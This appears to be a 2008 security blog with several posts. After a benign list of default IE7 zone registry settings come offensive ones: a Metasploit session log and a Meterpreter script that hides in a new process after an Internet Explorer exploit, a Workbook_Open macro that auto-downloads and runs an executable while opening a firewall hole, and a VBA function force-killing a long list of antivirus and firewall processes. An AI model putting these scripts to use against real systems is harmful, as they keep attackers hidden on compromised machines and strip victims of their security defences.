Wednesday, December 17, 2008

Default IE7 Settings for XP SP3 and Server 2003 SP1

In doing some research on IE7 permissions I searched high and low on the MSDN and similar places, and couldn't find a complete list of default settings. So, I created the following spreadsheet to document what was available, by default, for the various security zones ('Intranet', 'Internet', etc). This was a quick analysis and only includes those with 'simple' registry values (like 0, 1, etc), and doesn't parse out any of the more complex values. See this MS link for more info.

When I created it, I looked at a fresh XP SP3 install and an almost new Server 2003 SP1 install. I followed the rules for precedence when conflicting rules are in place (e.g. HKLM vs HKCU, Domain policy over default HKLM/HKCU, etc) and came up with the final results. At some point, I'll go back and do it properly with complete documentation of the sources of the various settings, but in the mean time if anyone else would find this useful, here ya go.

Specifically, the settings that may be interested to look at are:

  • 1206 Miscellaneous: Allow scripting of Internet Explorer Web browser control ^
  • 1208 ActiveX controls and plug-ins: Allow previously unused ActiveX controls to run without prompt ^
  • 1209 ActiveX controls and plug-ins: Allow Scriptlets
  • 1407 Scripting: Allow Programmatic clipboard access
  • 1607 Miscellaneous: Navigate sub-frames across different domains
  • 1805 Launching programs and files in webview #
  • 1806 Miscellaneous: Launching applications and unsafe files
  • 1809 Miscellaneous: Use Pop-up Blocker ** ^
  • 1A04 Miscellaneous: Don't prompt for client certificate selection when no certificates or only one certificate exists * ^
  • 1A05 Allow 3rd party persistent cookies *
  • 1A10 Privacy Settings *
  • 2102 Miscellaneous: Allow script initiated windows without size or position constraints ** ^
  • 2103 Scripting: Allow status bar updates via script ^
  • 2104 Miscellaneous: Allow websites to open windows without address or status bars ^
  • 2105 Scripting: Allow websites to prompt for information using scripted windows ^
  • 2200 Downloads: Automatic prompting for file downloads ** ^
  • 2201 ActiveX controls and plug-ins: Automatic prompting for ActiveX controls ** ^
  • 2301 Miscellaneous: Use Phishing Filter ^
  • 1207 Reserved #
  • 1408 Reserved #
  • 1807 Reserved ** #
  • 180A Reserved #
  • 180D Reserved #

Lastly, if any of you who review this notice your settings at are different from these, please drop me an email.

The default IE7 settings are located at the below registry entries. If policy-enforced settings are in placed, they override whatever is set here.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

Default Windows IE7 Permissions

Bloggerized by Nathan Keltner at 10:20 AM 0 comments

Friday, December 12, 2008

Automatic migration to a new process with meterpreter

Playing with metasploit's new ie_xml_corruption module, I needed a way to automatically migrate outside of the current process (iexplore.exe). This particular exploit locks up the process upon exploitation, leaving the user sitting at a hung Internet Explorer. Should a user ctrl+alt+delete and terminate it, I didn't want to lose the session.

An example migrate script exists that will do some of this, but if you use it in it's default form, it migrates to lsass.exe. If meterpreter then crashes (or you close it), it'll kill the whole process... which you certainly don't want to do with lsass. Also, my little script has the added benefit of working even if the exploited user doesn't have admin privileges (and LSASS migration would then be impossible).

msf exploit(ie_xml_corruption) > exploit
[*] Exploit running as background job.
[*] Handler binding to LHOST 192.168.182.1
[*] Started reverse handler
[*] Using URL: http://192.168.182.1:80/ie-xml-corruption.html
[*] Server started.
[*] Sending HTML to 192.168.182.1:2761...
[*] Sending DLL to 192.168.182.1:2761...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (75776 bytes)
[*] Meterpreter session 5 opened (192.168.182.1:4444 -> 192.168.182.1:2762)
msf exploit(ie_xml_corruption) > sessions -i 5
[*] Starting interaction with 5...

run launch_and_migrate
[*] Launching hidden cmd.exe...
[*] Process 5560 created.
[*] Current process is IEXPLORE.EXE (656).  Migrating to 5560.
[*] Migration completed successfully.
[*] New server process: cmd.exe (5560)
[*] Old process 656 killed.


Save the file to .msf3/scripts/meterpreter/ (may need to create the subdirectories) and it'll become available to your meterpreter sessions. You should be able to set the script to automatically run with the advanced AutoRunScript option:

Payload advanced options (windows/reflectivemeterpreter/reverse_tcp):

   Name           : AutoLoadStdapi
   Current Setting: true
   Description    : Automatically load the Stdapi extension

   Name           : AutoRunScript
   Current Setting: 
   Description    : Script to autorun on meterpreter session creation


... but I couldn't get it to work in the few minutes I had to play with it. It may be broken on Windows, or I just may not be able to figure out how to do paths in Windows + Ruby. I'll check with my linux install over the weekend.

And here's the code:

launch_and_migrate.rb

##
## Meterpreter script that launches a hidden process, 
## migrates to it, then kills the old process.
##
## Provided by natron (natron 0x40 invisibledenizen 0x2E com)
##

# Get the target process name
target = args[0] || "cmd.exe"

def launchProc(target)
    print_status("Launching hidden #{target}...")

    # Set the vars; these can of course be modified if need be
    cmd_exec    = target
    cmd_args    = nil
    hidden      = true
    channelized = nil
    use_thread_token = false

    # Launch new process
    newproc = client.sys.process.execute(cmd_exec, cmd_args, 
            'Channelized' => channelized,
            'Hidden'      => hidden,
            'InMemory'    => nil,
            'UseThreadToken' => use_thread_token)

    print_status("Process #{newproc.pid} created.")
    
    return newproc
end

def migrateToProc(newproc)
    # Grab the current pid info
    server = client.sys.process.open
    print_status("Current process is #{server.name} (#{server.pid}).  Migrating to #{newproc.pid}.")
    
    # Save the old process info so we can kill it after migration.
    oldproc = server.pid
    
    # Do the migration
    client.core.migrate(newproc.pid.to_i)

    print_status("Migration completed successfully.")

    # Grab new process info
    server = client.sys.process.open

    print_status("New server process: #{server.name} (#{server.pid})")
    
    return oldproc
end

def killApp(procpid)
    client.sys.process.kill(procpid)
    print_status("Old process #{procpid} killed.")
end

# Main flow of execution
newProcPid = launchProc(target)
oldProc = migrateToProc(newProcPid)
killApp(oldProc)
Bloggerized by Nathan Keltner at 1:40 PM 2 comments
Labels: , , , ,

Sunday, November 16, 2008

< PRE > tags suck.

Apparently the < PRE > tag kills blogger's ability to do wordwrapping. Awesome. Someone with better blogging skills than I: what's the solution?
Bloggerized by Nathan Keltner at 6:52 PM 3 comments

Modifying Windows Firewall Rules from VBA

You can also modify the Microsoft Windows firewall from within VBA using the HNetCfg.FwMgr object. Versions of these scripts are available on MSDN.
Function Add_App_To_Firewall(program_name, program_executable, program_scope)
 
   Const NET_FW_PROFILE_DOMAIN = 0
   Const NET_FW_PROFILE_STANDARD = 1

   Const NET_FW_SCOPE_ALL_NAME = "All subnets"
   Const NET_FW_SCOPE_LOCAL_SUBNET_NAME = "Local subnet only"
 
   Const NET_FW_IP_VERSION_ANY = 2
 
   ' Create the firewall manager object.
   Dim fwMgr
   Set fwMgr = CreateObject("HNetCfg.FwMgr")

   ' Get the current profile for the local firewall policy.
   Dim profile
   Set profile = fwMgr.LocalPolicy.CurrentProfile
 
   Dim app
   Set app = CreateObject("HNetCfg.FwAuthorizedApplication")

   app.ProcessImageFileName = program_executable
   app.Name = program_name
   app.Scope = program_scope
 
   app.IpVersion = NET_FW_IP_VERSION_ANY
   app.Enabled = True

   On Error Resume Next
   profile.AuthorizedApplications.Add app

End Function

Function Remove_App_From_Firewall(program_executable)

   On Error Resume Next

   ' Create the firewall manager object.
   Dim fwMgr
   Set fwMgr = CreateObject("HNetCfg.FwMgr")
 
   ' Get the current profile for the firewall
   Dim fwPolicy
   Set fwPolicy = fwMgr.LocalPolicy.CurrentProfile
 
   ' Get the Auth Applications object so we can modify
   Dim colApplications
   Set colApplications = fwPolicy.AuthorizedApplications
 
   colApplications.Remove program_executable

End Function

As an example, here's the commands that will download the Tiny Web Server from the internet, unzip it, add it to the allowed exceptions list for the Windows FW, create a quick .html file, start the server, run Internet Explorer pointed to this server, then kill the server, remove the firewall rule, and delete all of the files.

Sub Workbook_Open()
   'Download tiny web server to the %TEMP% directory, use local copy of winzip to unzip
   'Obviously in a real world application you'd want to bring your own unzipper
   Download_File "http://www.ritlabs.com/download/tinyweb/tinyweb.zip", Environ("TEMP") &amp; "\tinyweb.zip"
   Run_Program "winzip", "-e -o %TEMP%\tinyweb.zip %TEMP%", INVISIBLE, WAIT
 
   Const NET_FW_SCOPE_ALL = 0, NET_FW_SCOPE_LOCAL_SUBNET = 1, NET_FW_SCOPE_CUSTOM = 2
   Add_App_To_Firewall "tiny-local", Environ("TEMP") &amp; "\tiny.exe", NET_FW_SCOPE_LOCAL_SUBNET
 
   Run_Cmd "echo iexplore-pwned > %TEMP%\index.html", INVISIBLE, WAIT
 
   Run_Program "%TEMP%\tiny.exe", "%TEMP% 12345", INVISIBLE, NOWAIT
 
   ' "Sleep" for a couple of seconds to allow tiny.exe to load
   Run_Cmd "ping -n 2 127.0.0.1", INVISIBLE, WAIT
 
   Run_Program "iexplore", "http://127.0.0.1:12345", VISIBLE, WAIT
 
   Run_Cmd "taskkill /F /IM tiny.exe", INVISIBLE, WAIT
 
   Remove_App_From_Firewall Environ("TEMP") &amp; "\tiny.exe"
 
   On Error Resume Next
   Kill Environ("TEMP") &amp; "\tinyweb.zip"
   Kill Environ("TEMP") &amp; "\SRC.zip"
   Kill Environ("TEMP") &amp; "\LICENSE.txt"
   Kill Environ("TEMP") &amp; "\File_id.diz"
   Kill Environ("TEMP") &amp; "\Readme.txt"
   Kill Environ("TEMP") &amp; "\Cgitest.zip"
   Kill Environ("TEMP") &amp; "\index.html"
   Kill Environ("TEMP") &amp; "\tiny.exe"

End Sub
Bloggerized by Nathan Keltner at 6:36 PM 0 comments

How to Kill Antivirus from Word or Excel VBA

Building off of the previous posts and functions, here's how to kill off antivirus from within a VBA Macro in Excel or Word (I stole this list from the meterpreter script):
Function Build_Cmd_List(arrayCmds, command)
       
    If arrayCmds(0) <> "" Then
        ReDim Preserve arrayCmds(UBound(arrayCmds) + 1) As String
    End If
   
    arrayCmds(UBound(arrayCmds)) = command
   
End Function

Function Kill_AV()

    Dim arrayCmds() As String
    ReDim arrayCmds(0) As String
    On Error Resume Next

    Build_Cmd_List arrayCmds, "taskkill /F /IM ""_avp32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""_avpcc.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""_avpm.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ackwin32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""adaware.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""advxdwin.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""agentsvr.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""agentw.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""alertsvc.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""alevir.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""alogserv.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""amon9x.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""anti-trojan.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""antivirus.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ants.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""apimonitor.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""aplica32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""apvxdwin.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""arr.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""atcon.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""atguard.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""atro55en.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""atupdater.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""atwatch.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""au.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""aupdate.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""auto-protect.nav80try.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""autodown.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""autotrace.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""autoupdate.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avconsol.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ave32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgcc32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgctrl.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgnt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avguard.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avkserv.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avnt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avp.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avp.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avp32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpcc.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpdos32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpm.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avptc32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpupd.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avsched32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwin.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwin95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwupd32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""blackd.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""blackice.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfiadmin.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfiaudit.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfinet.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfinet32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""claw95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""claw95cf.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cleaner.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cleaner3.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""defwatch.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""dvp95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""dvp95_0.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ecengine.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""esafe.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""espwatch.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-agnt95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-prot.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-prot95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-stopw.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""findviru.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""fp-win.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""fprot.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""frw.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""iamapp.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""iamserv.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ibmasn.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ibmavsp.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""icload95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""icloadnt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""icmon.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""icsupp95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""icsuppnt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""iface.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""iomon98.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""jedi.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""lockdown2000.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""lookout.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""luall.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""moolive.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mpftray.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""n32scanw.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""navapw32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""navlu32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""navnt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""navw32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""navwnt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nisum.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nmain.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""normist.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nupgrade.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nvc95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""outpost.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""padmin.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavcl.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavsched.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavw.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""pccwin98.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""pcfwallicon.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""persfw.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""rav7.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""rav7win.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""rescue.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""safeweb.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""scan32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""scan95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""scanpm.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""scrscan.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""serv95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""smc.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""sphinx.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""sweep95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""tbscan.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""tca.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""tds2-98.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""tds2-nt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vet95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vettray.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vscan40.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsecomr.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vshwin32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsstat.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""webscanx.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""wfindv32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""zonealarm.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgserv.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgserv9.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avguard.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgw.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avkpop.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avkserv.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avkservice.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avkwctl9.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avltmain.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avnt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avp.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avp32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpcc.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpdos32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpm.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avptc32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpupd.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpupd.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avsched32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avsynmgr.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwinnt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwupd.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwupd32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwupd32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwupsrv.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avxmonitor9x.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avxmonitornt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avxquar.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avxquar.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""backweb.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""bargains.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""bd_professional.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""beagle.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""belt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""bidef.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""bidserver.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""bipcp.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""bipcpevalsetup.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""bisp.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""blackd.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""blackice.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""blss.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""bootconf.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""bootwarn.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""borg2.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""bpc.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""brasil.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""bs120.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""bundle.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""bvt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ccapp.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ccevtmgr.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ccpxysvc.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cdp.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfd.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfgwiz.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfiadmin.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfiaudit.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfiaudit.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfinet.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfinet32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""claw95cf.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""clean.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cleaner.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cleaner3.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cleanpc.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""click.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cmd.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cmd32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cmesys.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cmgrdian.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cmon016.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""connectionmonitor.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cpd.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cpf9x206.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cpfnt206.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ctrl.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cv.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cwnb181.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cwntdwmo.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""datemanager.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""dcomx.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""defalert.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""defscangui.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""defwatch.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""deputy.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""divx.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""dllcache.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""dllreg.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""doors.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""dpf.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""dpfsetup.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""dpps2.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""drwatson.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""drweb32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""drwebupw.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""dssagent.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""dvp95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""dvp95_0.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ecengine.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""efpeadm.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""emsw.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ent.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""esafe.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""escanhnt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""escanv95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""espwatch.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ethereal.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""etrustcipe.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""evpn.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""exantivirus-cnet.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""exe.avxw.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""expert.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""explore.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""fameh32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""fast.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""fch32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""fih32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""findviru.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""firewall.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""fnrb32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""fprot.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-prot.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-prot95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""fp-win.exe"""
